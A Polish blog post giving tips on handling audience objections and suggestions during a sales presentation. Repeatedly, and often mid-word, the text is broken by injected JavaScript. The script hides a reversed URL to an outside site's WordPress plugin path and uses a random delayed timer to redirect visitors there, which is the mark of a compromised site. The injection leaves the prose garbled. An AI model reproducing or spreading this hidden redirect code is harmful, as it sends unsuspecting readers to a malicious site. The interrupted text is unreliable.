Nieraz podczas prezentacji znajdziesz się w sytuacji gdy ludzie:
1. Będą zarzucać Cię negatywnymi opiniami na temat oferowanego przez Ciebie produktu (nie jest toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobrze)
2. Będą zgłaszać swoje uwagi lub propozycje usprawnienia produktu/obsługi klienta (jest znacznie lepiej – zależy im na poprawie Twoich usług – może będą korzystać?!)
Tego typu uwagi możesz podzielić na dwie kategorie:
1. Znasz sprawę i potrafisz sobie poradzić z odpowiedzią na zarzut/propozycję (odpowiadaj wtedy od razu!).
2. Temat nie jest Ci znany – za wysoki poziom szczegółowości lub zarzut/pytanie słyszysz po raz pierwszy
Co zrobić w drugiej sytuacji? Wróć toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do tytułu wpisu 🙂
Dobrym sposobem jest zapisanie sobie na kartce uwag, które powtarzają się. Zrób toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to od razu, gdy kilka osób zgłosi swoje uwagi. Ludzie zauważą, że poważnie traktujesz ich informacje zwrotne. Oczywiście jeśli zarzuty były uzasadnione wykorzystaj te notatki i przekaż je toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do osób odpowiedzialnych w Twojej firmie za dany produkt a jeśli sam jesteś sobie sterem, żeglarzem i okrętem, pomyśl co należy usprawnić i co zmienić w usłudze/produkcie aby potoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobne sytuacje nie powtórzyły się.
Aby zrobić jeszcze lepsze wrażenie możesz toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dopytać najbardziej aktywne osoby o szczegóły propozycji. Możesz zebrać numery telefonów lub adresy mailowe od zainteresowanych tematem uczestników prezentacji. Poinformujesz ich później o losach ich propozycji i uwag.
Jeśli pretensje uczestników pokazu są nieuzasadnione toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to… wiesz co masz później zrobić z zapisaną kartką!
![]() |
Wpis Ci się podobał?
Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!